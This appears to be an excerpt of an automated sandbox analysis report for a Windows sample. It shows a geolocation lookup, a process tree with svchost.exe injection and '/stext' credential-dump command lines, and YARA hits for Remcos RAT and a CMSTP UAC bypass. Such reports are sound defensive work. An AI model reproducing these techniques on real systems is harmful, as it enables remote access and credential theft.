Jul 3, 2024 14:50:56.770365000 CEST	1170	IN	HTTP/1.1 200 OK date: Wed, 03 Jul 2024 12:50:56 GMT server: Apache content-length: 962 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

Target ID:	0
Start time:	08:48:54
Start date:	03/07/2024
Path:	C:\Users\user\Desktop\cnaniAxghZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\cnaniAxghZ.exe"
Imagebase:	0x10000
File size:	1'355'776 bytes
MD5 hash:	0F85FF8E8CAA7715B1ED7243EBBFCF9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	5
Start time:	08:50:52
Start date:	03/07/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\cnaniAxghZ.exe"
Imagebase:	0xa0000
File size:	106'213'376 bytes
MD5 hash:	60C09330C233F3B7A6759B8A719245CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Target ID:	6
Start time:	08:50:53
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\cnaniAxghZ.exe"
Imagebase:	0xea0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.2877207597.0000000003000000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.2877257882.0000000003012000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Target ID:	7
Start time:	08:50:56
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ncqkhweaghcgworcchyfyhlbjpqn"
Imagebase:	0xea0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	8
Start time:	08:50:56
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\qwvdipptuputyufolskgjmgkrwiwkdi"
Imagebase:	0xea0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	9
Start time:	08:50:56
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\aybv"
Imagebase:	0xea0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	12
Start time:	08:50:57
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8084 -s 1288
Imagebase:	0x150000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false